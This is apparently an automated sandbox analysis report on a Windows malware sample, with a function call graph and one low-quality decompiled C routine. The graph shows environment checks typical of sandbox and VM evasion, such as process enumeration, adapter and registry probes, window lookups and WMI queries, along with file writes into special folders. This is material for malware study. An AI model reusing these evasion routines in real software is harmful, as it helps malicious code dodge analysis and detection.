285c805a4ef CoUninitialize TerminateThread 56291->56293 56520 285c805c4c0 12 API calls messages 56292->56520 56302 285c805bfdf collate 56293->56302 56294 285c805a15c 56294->56279 56296 285c805a529 56521 285c805c4c0 12 API calls messages 56296->56521 56298 285c805a54b 56522 285c809c000 31 API calls _Mpunct 56298->56522 56300 285c805a558 56301 285c805a5af collate 56300->56301 56523 285c8058c10 12 API calls 4 library calls 56300->56523 56526 285c809bd00 31 API calls _Mpunct 56301->56526 56579 285c80576d0 RaiseException collate 56302->56579 56305 285c805a5c8 56308 285c805a61a collate 56305->56308 56527 285c8058c10 12 API calls 4 library calls 56305->56527 56306 285c805a57e 56524 285c80593d0 12 API calls 56306->56524 56311 285c8056c40 messages 12 API calls 56308->56311 56380 285c805a668 collate messages _Strcoll __ExceptionPtr::__ExceptionPtr 56311->56380 56312 285c805a598 56525 285c8058d60 12 API calls 4 library calls 56312->56525 56314 285c805a5e9 56528 285c80593d0 12 API calls 56314->56528 56316 285c805a603 56529 285c8058d60 12 API calls 4 library calls 56316->56529 56320 285c805b906 Sleep 56320->56380 56324 285c805a7a0 Sleep 56324->56380 56328 285c805a998 Sleep 56328->56380 56330 285c805b7f5 Sleep 56330->56380 56333 285c805b0f5 Sleep 56333->56380 56334 285c805c061 collate 56334->56262 56336 285c805b289 SHGetSpecialFolderPathA lstrcatA 56540 285c8097750 53 API calls 56336->56540 56339 285c805b43f SHGetSpecialFolderPathA lstrcatA 56545 285c809a9c8 CreateFileA WriteFile CloseHandle 56339->56545 56340 285c805b36a SHGetSpecialFolderPathA lstrcatA 56543 285c8097750 53 API calls 56340->56543 56341 285c805b932 56555 285c805c310 12 API calls 56341->56555 56344 285c8056b10 12 API calls _Mpunct 56344->56380 56347 285c805b9f1 56556 285c8093d60 12 API calls 4 library calls 56347->56556 56351 285c805ba1e 56557 285c806a7f0 98 API calls 6 library calls 56351->56557 56352 285c805bb86 56353 285c805bbb9 56352->56353 56354 285c805bb91 56352->56354 56357 285c8056c40 messages 12 API 
calls 56353->56357 56564 285c8057ed0 109 API calls 5 library calls 56354->56564 56360 285c805bbb7 56357->56360 56358 285c805c510 12 API calls 56358->56380 56359 285c805ba56 collate 56558 285c8057760 12 API calls messages 56359->56558 56565 285c8056b10 12 API calls 4 library calls 56360->56565 56361 285c805d0c0 12 API calls 56361->56380 56364 285c805bc01 GetCurrentProcessId 56566 285c8059d20 12 API calls 56364->56566 56367 285c805ba75 56559 285c80568f0 12 API calls _Mpunct 56367->56559 56368 285c805bc16 56567 285c805ca20 12 API calls collate 56368->56567 56371 285c805ba89 GetCurrentProcessId 56560 285c8059d20 12 API calls 56371->56560 56372 285c805bc23 56568 285c8058d60 12 API calls 4 library calls 56372->56568 56376 285c805ba9e 56561 285c805ca20 12 API calls collate 56376->56561 56379 285c805bd28 56570 285c8058d60 12 API calls 4 library calls 56379->56570 56380->56334 56380->56339 56380->56341 56380->56344 56380->56352 56380->56358 56380->56361 56395 285c80568f0 12 API calls 56380->56395 56410 285c8056730 12 API calls 56380->56410 56530 285c806a380 98 API calls 3 library calls 56380->56530 56531 285c8093d60 12 API calls 4 library calls 56380->56531 56532 285c806a7f0 98 API calls 6 library calls 56380->56532 56533 285c80cab54 23 API calls _Getcoll 56380->56533 56534 285c80c4dcc RaiseException Concurrency::cancel_current_task new 56380->56534 56535 285c805cf30 RaiseException messages Concurrency::critical_section::scoped_lock::scoped_lock 56380->56535 56536 285c80cab54 23 API calls _Getcoll 56380->56536 56537 285c80cab54 23 API calls _Getcoll 56380->56537 56538 285c8056430 28 API calls 56380->56538 56539 285c80cab54 23 API calls _Getcoll 56380->56539 56541 285c8057ae0 10 API calls 2 library calls 56380->56541 56542 285c80cab54 23 API calls _Getcoll 56380->56542 56544 285c8057cb0 25 API calls 2 library calls 56380->56544 56546 285c809b510 45 API calls 6 library calls 56380->56546 56547 285c8057ed0 109 API calls 5 library calls 56380->56547 56548 285c80980c0 12 API 
calls 56380->56548 56549 285c809802c 70 API calls 56380->56549 56550 285c808a9e0 160 API calls 3 library calls 56380->56550 56551 285c80593d0 12 API calls 56380->56551 56552 285c8056200 12 API calls 56380->56552 56553 285c80cab54 23 API calls _Getcoll 56380->56553 56554 285c80cab54 23 API calls _Getcoll 56380->56554 56382 285c805bc37 56569 285c8058c10 12 API calls 4 library calls 56382->56569 56383 285c805bd3f 56571 285c8058c10 12 API calls 4 library calls 56383->56571 56386 285c805bd55 56572 285c8058c10 12 API calls 4 library calls 56386->56572 56388 285c805bd7e 56573 285c805c310 12 API calls 56388->56573 56390 285c805baae collate 56562 285c809b510 45 API calls 6 library calls 56390->56562 56391 285c805bdaa 56574 285c8093d60 12 API calls 4 library calls 56391->56574 56393 285c805bdd4 56575 285c806a7f0 98 API calls 6 library calls 56393->56575 56395->56380 56398 285c805bb38 CoUninitialize TerminateThread 56401 285c805bb5a collate 56398->56401 56400 285c805be71 CoUninitialize TerminateThread 56404 285c805be91 56400->56404 56563 285c805c3d0 RaiseException 56401->56563 56402 285c805be05 56576 285c809b510 45 API calls 6 library calls 56402->56576 56407 285c805bb81 collate 56404->56407 56577 285c805c690 RaiseException Concurrency::cancel_current_task new 56404->56577 56578 285c805c3d0 RaiseException 56407->56578 56410->56380 56412 285c8056d47 56411->56412 56413 285c8056c6e 56411->56413 56582 285c80a0924 12 API calls 2 library calls 56412->56582 56415 285c8056cac 56413->56415 56416 285c8056c7d 56413->56416 56419 285c8056cb6 56415->56419 56420 285c8056d60 56415->56420 56417 285c8056d53 56416->56417 56418 285c8056c8b 56416->56418 56583 285c80a0924 12 API calls 2 library calls 56417->56583 56580 285c8056f60 12 API calls 2 library calls 56418->56580 56424 285c8056ca7 std::_Maklocwcs 56419->56424 56581 285c8057030 RaiseException Concurrency::cancel_current_task new std::_Maklocwcs 56419->56581 56584 285c80a0900 12 API calls 2 library calls 56420->56584 56424->56258 56585 
285c80a0220 GetProcessHeap HeapAlloc 56427->56585 56429 285c809cd10 56430 285c809cd14 56429->56430 56592 285c80a0330 CreateToolhelp32Snapshot 56429->56592 56430->56261 56433 285c809cd3e 56433->56261 56436 285c809cd65 56436->56261 56437 285c809cd7b GetModuleHandleW 56438 285c809cd92 __scrt_initialize_thread_safe_statics 56437->56438 56610 285c809f230 56438->56610 56440 285c809cdb3 56441 285c809cfe7 56440->56441 56620 285c809d230 56440->56620 56441->56261 56449 285c809cdf7 56449->56441 56450 285c80a0220 10 API calls 56449->56450 56451 285c809ce13 56450->56451 56666 285c809d870 56451->56666 56454 285c809ce51 56674 285c809d990 56454->56674 56456 285c809ce62 56683 285c809da30 56456->56683 56460 285c809ce83 56705 285c809dcc0 56460->56705 56464 285c809ce9f 56732 285c809e070 56464->56732 56466 285c809cead 56736 285c809e5c0 56466->56736 56468 285c809cebb 56751 285c809e7d0 56468->56751 56470 285c809cec9 56767 285c809e1c0 56470->56767 56472 285c809ced7 56782 285c809e3a0 56472->56782 56474 285c809cee5 56797 285c809ea60 56474->56797 56476 285c809cef3 56476->56441 56814 285c809fec0 56476->56814 56486 285c809cf46 56850 285c809f080 56486->56850 56488 285c809cf54 56488->56441 56853 285c809f2f0 56488->56853 56494 285c809cf85 56494->56441 56892 285c809fe10 56494->56892 56497 285c80a0220 10 API calls 56498 285c809cfab 56497->56498 56498->56441 56899 285c809fa60 56498->56899 56506->56265 56507->56267 56508->56269 56509->56278 56510->56272 56511->56274 56512->56276 56513->56294 56514->56281 56515->56283 56516->56285 56517->56287 56518->56289 56519->56291 56520->56296 56521->56298 56522->56300 56523->56306 56524->56312 56525->56301 56526->56305 56527->56314 56528->56316 56529->56308 56530->56380 56531->56380 56532->56380 56533->56324 56534->56380 56535->56380 56536->56328 56537->56333 56538->56380 56539->56336 56540->56380 56541->56380 56542->56340 56543->56380 56544->56380 56545->56380 56546->56380 56547->56380 56548->56380 56549->56380 56550->56380 56551->56380 56552->56380 
56553->56330 56554->56320 56555->56347 56556->56351 56557->56359 56558->56367 56559->56371 56560->56376 56561->56390 56562->56398 56563->56407 56564->56360 56565->56364 56566->56368 56567->56372 56568->56382 56569->56379 56570->56383 56571->56386 56572->56388 56573->56391 56574->56393 56575->56402 56576->56400 56577->56407 56578->56302 56579->56334 56580->56424 56581->56424 56582->56417 56583->56420 56586 285c80a026d GetAdaptersInfo 56585->56586 56587 285c80a025b 56585->56587 56588 285c80a0280 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 56586->56588 56591 285c80a02c2 GetProcessHeap HeapFree 56586->56591 56587->56429 56588->56587 56589 285c80a02b4 GetAdaptersInfo 56588->56589 56589->56591 56591->56429 56593 285c80a03ed 56592->56593 56594 285c80a0374 Process32FirstW 56592->56594 56599 285c80c59d0 collate 4 API calls 56593->56599 56595 285c80a038e StrCmpIW 56594->56595 56596 285c80a03e4 CloseHandle 56594->56596 56597 285c80a03af Process32NextW 56595->56597 56598 285c80a03a3 CloseHandle 56595->56598 56596->56593 56597->56596 56601 285c80a03be 56597->56601 56598->56593 56600 285c809cd31 56599->56600 56600->56433 56604 285c809d010 56600->56604 56602 285c80a03c0 StrCmpIW 56601->56602 56602->56598 56603 285c80a03d5 Process32NextW 56602->56603 56603->56596 56603->56602 56605 285c809d190 56604->56605 56606 285c80a0330 12 API calls 56605->56606 56607 285c809d1a7 56605->56607 56606->56605 56608 285c80c59d0 collate 4 API calls 56607->56608 56609 285c809cd59 56608->56609 56609->56436 56609->56437 56611 285c809f25b __ExceptionPtr::__ExceptionPtr 56610->56611 56930 285c809d1d0 56611->56930 56614 285c809f2d4 56617 285c80c59d0 collate 4 API calls 56614->56617 56615 285c809f2ac RegCloseKey 56616 285c80c59d0 collate 4 API calls 56615->56616 56618 285c809f2cc 56616->56618 56619 285c809f2e6 56617->56619 56618->56440 56619->56440 56623 285c809d2f0 __ExceptionPtr::__ExceptionPtr 56620->56623 56621 285c809d1d0 35 API calls 56621->56623 56623->56621 56624 285c809d34a 56623->56624 56949 
285c80a0130 56623->56949 56625 285c80c59d0 collate 4 API calls 56624->56625 56626 285c809cdcd 56625->56626 56627 285c809d380 56626->56627 56628 285c809d420 __ExceptionPtr::__ExceptionPtr 56627->56628 56629 285c809d1d0 35 API calls 56628->56629 56632 285c809d48b 56628->56632 56630 285c809d456 RegOpenKeyExW 56629->56630 56630->56628 56631 285c809d48f RegCloseKey 56630->56631 56631->56632 56633 285c80c59d0 collate 4 API calls 56632->56633 56634 285c809cddb 56633->56634 56635 285c809d4d0 56634->56635 56636 285c809d5d9 __ExceptionPtr::__ExceptionPtr 56635->56636 56637 285c809d5ea GetWindowsDirectoryW 56636->56637 56961 285c80a00a0 56637->56961 56639 285c809d608 56640 285c809d60c Wow64DisableWow64FsRedirection 56639->56640 56642 285c809d617 __ExceptionPtr::__ExceptionPtr 56639->56642 56640->56642 56641 285c809d620 PathCombineW 56641->56642 56642->56641 56643 285c809d1d0 35 API calls 56642->56643 56649 285c809d682 56642->56649 56644 285c809d666 GetFileAttributesW 56643->56644 56644->56642 56645 285c809d6b0 56646 285c80c59d0 collate 4 API calls 56645->56646 56647 285c809cde9 56646->56647 56652 285c809d740 56647->56652 56648 285c809d6ef GetCurrentProcess 56650 285c809d6ff 56648->56650 56649->56645 56649->56648 56650->56645 56651 285c809d706 Wow64RevertWow64FsRedirection 56650->56651 56651->56645 56653 285c809d76e __ExceptionPtr::__ExceptionPtr 56652->56653 56654 285c80a00a0 GetCurrentProcess 56653->56654 56655 285c809d7cb 56654->56655 56656 285c809d7d7 ExpandEnvironmentStringsW 56655->56656 56657 285c809d7ec SHGetSpecialFolderPathW 56655->56657 56658 285c809d7fb PathCombineW GetFileAttributesW 56656->56658 56657->56658 56659 285c809d829 56658->56659 56660 285c809d84a 56658->56660 56659->56660 56661 285c809d82d 56659->56661 56662 285c80c59d0 collate 4 API calls 56660->56662 56663 285c80c59d0 collate 4 API calls 56661->56663 56664 285c809d85c 56662->56664 56665 285c809d842 56663->56665 56664->56449 56665->56449 56667 285c809d8e0 CreateFileW 56666->56667 56669 285c809d924 
__ExceptionPtr::__ExceptionPtr 56667->56669 56668 285c809d1d0 35 API calls 56668->56669 56669->56667 56669->56668 56670 285c809d950 CloseHandle 56669->56670 56671 285c809d94c 56669->56671 56670->56671 56672 285c80c59d0 collate 4 API calls 56671->56672 56673 285c809ce22 FindWindowW FindWindowW 56672->56673 56673->56454 56675 285c80c8ef0 __ExceptionPtr::__ExceptionPtr 56674->56675 56676 285c809d9bb WNetGetProviderNameW 56675->56676 56677 285c809da0f 56676->56677 56678 285c809d9dc StrCmpIW 56676->56678 56679 285c80c59d0 collate 4 API calls 56677->56679 56680 285c80c59d0 collate 4 API calls 56678->56680 56681 285c809da21 56679->56681 56682 285c809da07 56680->56682 56681->56456 56682->56456 56685 285c809da70 __ExceptionPtr::__ExceptionPtr 56683->56685 56684 285c809d1d0 35 API calls 56684->56685 56685->56684 56686 285c80a0330 12 API calls 56685->56686 56687 285c809dab5 56685->56687 56686->56685 56688 285c80c59d0 collate 4 API calls 56687->56688 56689 285c809ce75 56688->56689 56690 285c809dae0 56689->56690 56966 285c80a0410 CoInitializeEx 56690->56966 56692 285c809db0b 56693 285c809db13 SysAllocString SysAllocString 56692->56693 56694 285c809dcb5 56692->56694 56695 285c809dbaa 56693->56695 56700 285c809db55 56693->56700 56694->56460 56696 285c809dbb4 SysFreeString 56695->56696 56703 285c809dbbd wcsstr 56695->56703 56696->56703 56697 285c809dba1 SysFreeString 56697->56695 56698 285c809dca5 56698->56460 56699 285c809dc7f CoUninitialize 56699->56698 56700->56697 56701 285c809db9b CoUninitialize 56700->56701 56701->56697 56703->56698 56703->56699 56704 285c809dc5a VariantClear 56703->56704 56704->56703 56706 285c80a0410 9 API calls 56705->56706 56707 285c809dd20 56706->56707 56708 285c809dd28 SysAllocString SysAllocString 56707->56708 56709 285c809df97 56707->56709 56710 285c809ddc0 56708->56710 56716 285c809dd6a 56708->56716 56711 285c80c59d0 collate 4 API calls 56709->56711 56712 285c809ddc5 SysFreeString 56710->56712 56719 285c809ddce 56710->56719 56714 285c809ce91 
56711->56714 56712->56719 56713 285c809ddb7 SysFreeString 56713->56710 56729 285c809dfd0 56714->56729 56715 285c809df69 CoUninitialize 56715->56709 56716->56713 56717 285c809ddb1 CoUninitialize 56716->56717 56717->56713 56719->56709 56719->56715 56720 285c809de60 StrCmpIW 56719->56720 56721 285c809df48 VariantClear 56719->56721 56720->56721 56722 285c809de79 VariantClear 56720->56722 56721->56719 56723 285c809dea5 SafeArrayAccessData 56722->56723 56723->56721 56724 285c809debe SafeArrayGetLBound SafeArrayGetUBound 56723->56724 56725 285c809df3f SafeArrayUnaccessData 56724->56725 56726 285c809def0 SafeArrayGetElement 56724->56726 56725->56721 56728 285c809df10 56726->56728 56728->56725 56728->56726 56979 285c80d19f0 25 API calls 4 library calls 56728->56979 56980 285c80a0670 56729->56980 56731 285c809dff1 56731->56464 56735 285c809e08a 56732->56735 56733 285c809e092 56733->56466 56734 285c80a0670 58 API calls 56734->56735 56735->56733 56735->56734 56737 285c80a0410 9 API calls 56736->56737 56738 285c809e5e5 56737->56738 56739 285c809e5ed SysAllocString SysAllocString 56738->56739 56740 285c809e7c3 56738->56740 56741 285c809e684 56739->56741 56746 285c809e62f 56739->56746 56740->56468 56743 285c809e692 wcsstr 56741->56743 56744 285c809e689 SysFreeString 56741->56744 56742 285c809e67b SysFreeString 56742->56741 56745 285c809e7ab 56743->56745 56747 285c809e77a CoUninitialize 56743->56747 56750 285c809e759 VariantClear 56743->56750 56744->56743 56745->56468 56746->56742 56748 285c809e675 CoUninitialize 56746->56748 56747->56745 56748->56742 56750->56743 56752 285c80a0410 9 API calls 56751->56752 56753 285c809e800 56752->56753 56754 285c809ea47 56753->56754 56755 285c809e808 SysAllocString SysAllocString 56753->56755 56754->56470 56756 285c809e8a5 56755->56756 56760 285c809e850 56755->56760 56757 285c809e8b2 SysFreeString 56756->56757 56765 285c809e8bb wcsstr 56756->56765 56757->56765 56758 285c809e89c SysFreeString 56758->56756 56759 285c809ea34 56759->56470 
56760->56758 56762 285c809e896 CoUninitialize 56760->56762 56761 285c809ea0e CoUninitialize 56761->56759 56762->56758 56764 285c809e96d VariantClear 56764->56765 56765->56759 56765->56761 56765->56764 56766 285c809e9e9 VariantClear 56765->56766 56766->56765 56768 285c80a0410 9 API calls 56767->56768 56769 285c809e1eb 56768->56769 56770 285c809e1f3 SysAllocString SysAllocString 56769->56770 56771 285c809e38c 56769->56771 56772 285c809e28a 56770->56772 56777 285c809e235 56770->56777 56771->56472 56774 285c809e294 SysFreeString 56772->56774 56781 285c809e29d wcsstr 56772->56781 56773 285c809e281 SysFreeString 56773->56772 56774->56781 56775 285c809e37c 56775->56472 56776 285c809e358 CoUninitialize 56776->56775 56777->56773 56778 285c809e27b CoUninitialize 56777->56778 56778->56773 56780 285c809e333 VariantClear 56780->56781 56781->56775 56781->56776 56781->56780 56783 285c80a0410 9 API calls 56782->56783 56784 285c809e3c5 56783->56784 56785 285c809e3cd SysAllocString SysAllocString 56784->56785 56786 285c809e5ab 56784->56786 56787 285c809e405 56785->56787 56788 285c809e45a 56785->56788 56786->56474 56789 285c809e451 SysFreeString 56787->56789 56793 285c809e44b CoUninitialize 56787->56793 56790 285c809e464 SysFreeString 56788->56790 56796 285c809e46d wcsstr 56788->56796 56789->56788 56790->56796 56791 285c809e59d 56791->56474 56792 285c809e570 CoUninitialize 56792->56791 56793->56789 56795 285c809e54f VariantClear 56795->56796 56796->56791 56796->56792 56796->56795 56798 285c80a0410 9 API calls 56797->56798 56799 285c809ea8b 56798->56799 56800 285c809ece3 56799->56800 56801 285c809ea93 SysAllocString SysAllocString 56799->56801 56800->56476 56802 285c809eb2a 56801->56802 56807 285c809ead5 56801->56807 56804 285c809eb34 SysFreeString 56802->56804 56812 285c809eb3d wcsstr 56802->56812 56803 285c809eb21 SysFreeString 56803->56802 56804->56812 56805 285c809ecd3 56805->56476 56806 285c809ecad CoUninitialize 56806->56805 56807->56803 56808 285c809eb1b CoUninitialize 
56807->56808 56808->56803 56810 285c809ebde VariantClear 56810->56812 56811 285c809ec33 VariantClear 56811->56812 56812->56805 56812->56806 56812->56810 56812->56811 56813 285c809ec88 VariantClear 56812->56813 56813->56812 56815 285c809ff00 __ExceptionPtr::__ExceptionPtr 56814->56815 56816 285c809d1d0 35 API calls 56815->56816 56817 285c80a0330 12 API calls 56815->56817 56818 285c809ff45 56815->56818 56816->56815 56817->56815 56819 285c80c59d0 collate 4 API calls 56818->56819 56820 285c809cf07 56819->56820 56820->56441 56821 285c809ecf0 56820->56821 56824 285c809ed60 __ExceptionPtr::__ExceptionPtr 56821->56824 56822 285c809d1d0 35 API calls 56822->56824 56823 285c80a0130 9 API calls 56823->56824 56824->56822 56824->56823 56825 285c809edac 56824->56825 56826 285c80c59d0 collate 4 API calls 56825->56826 56827 285c809cf1c 56826->56827 56828 285c809ede0 56827->56828 56830 285c809ee30 __ExceptionPtr::__ExceptionPtr 56828->56830 56829 285c809d1d0 35 API calls 56829->56830 56830->56829 56831 285c80a0330 12 API calls 56830->56831 56832 285c809ee75 56830->56832 56831->56830 56833 285c80c59d0 collate 4 API calls 56832->56833 56834 285c809cf2a 56833->56834 56835 285c809eea0 56834->56835 56838 285c809eed6 __ExceptionPtr::__ExceptionPtr 56835->56838 56836 285c809ef48 SHGetSpecialFolderPathW 56837 285c809ef5f PathCombineW 56836->56837 56839 285c809d1d0 35 API calls 56837->56839 56838->56836 56841 285c809f019 GetCurrentProcess 56838->56841 56842 285c809efba 56838->56842 56844 285c809f033 ExpandEnvironmentStringsW 56838->56844 56840 285c809ef95 GetFileAttributesW 56839->56840 56840->56838 56841->56838 56843 285c80c59d0 collate 4 API calls 56842->56843 56845 285c809cf38 56843->56845 56844->56837 56846 285c809f110 56845->56846 56847 285c809f12b 56846->56847 56848 285c809f152 56847->56848 56849 285c80a0670 58 API calls 56847->56849 56848->56486 56849->56847 56851 285c80a0670 58 API calls 56850->56851 56852 285c809f0a1 56851->56852 56852->56488 56854 285c809f370 
                C-Code - Quality: 30%
                			E00000285285C8059E00(void* __edx, void* __ebp, void* __esp, void* __rax, long long __rbx, void* __r8, signed int __r9, void* __r11) {
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* __r12;
                				void* __r13;
                				void* __r14;
                				void* __r15;
                				void* _t712;
                				void* _t762;
                				void* _t767;
                				void* _t769;
                				void* _t778;
                				void* _t798;
                				signed int _t818;
                				void* _t821;
                				void* _t823;
                				void* _t824;
                				void* _t825;
                				void* _t826;
                				void* _t845;
                				void* _t851;
                				void* _t865;
                				void* _t866;
                				void* _t868;
                				void* _t869;
                				void* _t870;
                				void* _t875;
                				void* _t878;
                				void* _t882;
                				void* _t883;
                				void* _t884;
                				void* _t887;
                				void* _t888;
                				void* _t890;
                				void* _t892;
                				void* _t906;
                				void* _t908;
                				void* _t915;
                				void* _t916;
                				void* _t917;
                				void* _t919;
                				void* _t920;
                				void* _t921;
                				int _t924;
                				void* _t925;
                				void* _t926;
                				long _t932;
                				void* _t943;
                				void* _t948;
                				void* _t950;
                				void* _t953;
                				void* _t954;
                				void* _t955;
                				void* _t956;
                				void* _t957;
                				void* _t958;
                				void* _t959;
                				void* _t960;
                				void* _t961;
                				void* _t963;
                				void* _t965;
                				signed int _t968;
                				signed int _t969;
                				signed int _t982;
                				signed char _t988;
                				signed char _t991;
                				signed char _t996;
                				signed char _t1003;
                				signed char _t1005;
                				void* _t1042;
                				void* _t1257;
                				signed int _t1258;
                				signed long long _t1259;
                				intOrPtr _t1261;
                				signed long long _t1262;
                				intOrPtr _t1264;
                				long long _t1265;
                				long long _t1267;
                				intOrPtr _t1276;
                				intOrPtr _t1278;
                				signed long long _t1279;
                				signed long long* _t1281;
                				intOrPtr _t1282;
                				intOrPtr _t1284;
                				signed long long _t1285;
                				intOrPtr _t1287;
                				signed long long _t1289;
                				signed long long _t1292;
                				signed long long _t1294;
                				signed long long _t1297;
                				signed int* _t1301;
                				signed long long _t1303;
                				signed long long _t1306;
                				signed long long _t1308;
                				signed long long _t1310;
                				signed long long _t1313;
                				signed long long _t1315;
                				signed long long _t1317;
                				signed long long _t1320;
                				signed long long _t1322;
                				signed long long _t1325;
                				signed long long _t1327;
                				intOrPtr _t1333;
                				intOrPtr _t1335;
                				signed long long _t1336;
                				long long _t1338;
                				intOrPtr _t1340;
                				intOrPtr _t1342;
                				signed long long _t1343;
                				intOrPtr _t1345;
                				signed int _t1346;
                				intOrPtr _t1347;
                				intOrPtr _t1349;
                				intOrPtr _t1350;
                				intOrPtr _t1352;
                				intOrPtr _t1355;
                				intOrPtr _t1357;
                				long long _t1358;
                				intOrPtr _t1360;
                				signed long long _t1362;
                				intOrPtr _t1364;
                				signed long long _t1368;
                				signed long long _t1370;
                				signed long long _t1372;
                				signed long long _t1374;
                				signed long long _t1376;
                				void* _t1378;
                				intOrPtr _t1382;
                				intOrPtr _t1383;
                				intOrPtr _t1387;
                				intOrPtr _t1407;
                				void* _t1408;
                				intOrPtr _t1410;
                				void* _t1411;
                				intOrPtr _t1428;
                				void* _t1429;
                				intOrPtr _t1458;
                				void* _t1459;
                				intOrPtr _t1461;
                				void* _t1462;
                				intOrPtr _t1471;
                				void* _t1472;
                				intOrPtr _t1474;
                				void* _t1475;
                				intOrPtr _t1522;
                				void* _t1523;
                				intOrPtr _t1525;
                				void* _t1526;
                				intOrPtr _t1583;
                				void* _t1584;
                				intOrPtr _t1586;
                				void* _t1587;
                				intOrPtr _t1619;
                				void* _t1620;
                				intOrPtr _t1622;
                				void* _t1623;
                				intOrPtr _t1632;
                				void* _t1633;
                				intOrPtr _t1638;
                				void* _t1639;
                				intOrPtr _t1644;
                				void* _t1645;
                				intOrPtr _t1710;
                				void* _t1808;
                				signed long long _t1812;
                				intOrPtr _t1816;
                				intOrPtr _t1817;
                				void* _t1818;
                				long long _t1820;
                				intOrPtr _t1822;
                				void* _t1823;
                				long long* _t1824;
                				void* _t1825;
                				void* _t1826;
                				void* _t1900;
                				void* _t1912;
                				void* _t1913;
                				signed long long _t1917;
                				signed long long _t1918;
                				signed long long _t1920;
                				void* _t1921;
                				long long _t1922;
                				long long _t1923;
                				long long _t1924;
                				long long _t1925;
                
                				_t1913 = __r11;
                				_t1365 = __rbx;
                				_t1257 = __rax;
                				_t1824 = _t1825 - 0x980;
                				_t1826 = _t1825 - 0xa80;
                				 *((long long*)(_t1824 + 0x538)) = 0xfffffffe;
                				 *((long long*)(_t1826 + 0xac0)) = __rbx;
                				r14d = 0;
                				 *(_t1824 + 0x160) = _t1918;
                				 *(_t1824 + 0x168) = _t1918;
                				 *(_t1824 + 0x168) = 0xf;
                				 *(_t1824 + 0x160) = _t1918;
                				 *(_t1824 + 0x150) = r14b;
                				_t1387 =  *0xc8153378; // 0x20c
                				if (_t1387 == 0) goto 0xc8059e6d;
                				WaitForSingleObject(??, ??);
                				if ( *0xc8153368 == 0) goto 0xc8059e91;
                				_t1891 = __r9 | 0xffffffff;
                				r8d = 0;
                				E00000285285C8056C40(__rbx, _t1824 + 0x150, 0xc8153358, _t1808, _t1818, __r8, __r9 | 0xffffffff); // executed
                				_t712 = E00000285285C809CD00(); // executed
                				if (_t712 != 0) goto 0xc805c0ab;
                				E00000285285C80CAE64(_t712, _t1257, _t1824 + 0x150, 0xc8153358);
                				E00000285285C80CAB80(0, _t1257);
                				_t1258 = _t1824 + 0x9d8;
                				 *(_t1826 + 0x28) = _t1258;
                				 *(_t1826 + 0x20) = r14d;
                				r9d = 0;
                				E00000285285C80CACE4(0, 0, _t1258, _t1365, _t1257, _t1818, 0x285c8059d90, __r9 | 0xffffffff);
                				 *0xc81532b8 = _t1258;
                				 *(_t1826 + 0x60) = _t1918;
                				 *(_t1826 + 0x68) = _t1918;
                				 *(_t1826 + 0x68) = 0xf;
                				 *(_t1826 + 0x60) = _t1918;
                				 *((char*)(_t1826 + 0x50)) = 0;
                				if ("iKInPE9WrB" != 0) goto 0xc8059f0a;
                				goto 0xc8059f1a;
                				if ( *((char*)("iKInPE9WrB" + (_t1918 | 0xffffffff) + 1)) != 0) goto 0xc8059f10;
                				E00000285285C8056B10(_t1365, _t1826 + 0x50, "iKInPE9WrB", _t1818, (_t1918 | 0xffffffff) + 1);
                				if ( *(_t1826 + 0x60) == 0) goto 0xc805a05e;
                				_t1668 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E00000285285C8051080(_t1824 + 0x650,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x4f;
                				E00000285285C8051420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x650, "127.0.0.1");
                				_t1671 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E00000285285C8051080(_t1824 + 0x870,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x4f;
                				E00000285285C8051420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x870, 0xc814e190);
                				_t1674 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E00000285285C8051080(_t1824 + 0x760,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x4f;
                				E00000285285C8051420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x760, 0xc814e1e0);
                				_t1677 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E00000285285C8051080(_t1824 + 0x390,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0xfff;
                				E00000285285C8051290(E00000285285C8051290(E00000285285C8051290(E00000285285C8051290(E00000285285C8051420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x390, 0xc814d140), _t1824 + 0x390), _t1824 + 0x760), _t1824 + 0x870), _t1824 + 0x650);
                				 *(_t1824 + 0x1a0) = _t1918;
                				 *(_t1824 + 0x1a8) = _t1918;
                				 *(_t1824 + 0x1a8) = 0xf;
                				 *(_t1824 + 0x1a0) = _t1918;
                				 *((char*)(_t1824 + 0x190)) = 0;
                				if ( *0xc814e1e0 != 0) goto 0xc805a093;
                				goto 0xc805a0aa;
                				asm("o16 nop [eax+eax]");
                				if ( *((char*)(0xc814e1e0 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0xc805a0a0;
                				E00000285285C8056B10(0xc814e1e0, _t1824 + 0x190, 0xc814e1e0, 0xc814d140, (_t1918 | 0xffffffff) + 1);
                				 *(_t1824 - 0x80) = _t1918;
                				 *(_t1824 - 0x78) = _t1918;
                				 *(_t1824 - 0x78) = 0xf;
                				 *(_t1824 - 0x80) = _t1918;
                				 *((char*)(_t1826 + 0x70)) = 0;
                				if ( *0xc814e190 != 0) goto 0xc805a0e1;
                				goto 0xc805a0ef;
                				if ( *((char*)(0xc814e190 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0xc805a0e5;
                				E00000285285C8056B10(0xc814e1e0, _t1826 + 0x70, 0xc814e190, 0xc814d140, (_t1918 | 0xffffffff) + 1);
                				 *(_t1824 - 0x40) = _t1918;
                				 *(_t1824 - 0x38) = _t1918;
                				 *(_t1824 - 0x38) = 0xf;
                				 *(_t1824 - 0x40) = _t1918;
                				 *((char*)(_t1824 - 0x50)) = 0;
                				if ( *0xc814d140 != 0) goto 0xc805a123;
                				goto 0xc805a13a;
                				asm("o16 nop [eax+eax]");
                				if ( *((char*)(0xc814d140 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0xc805a130;
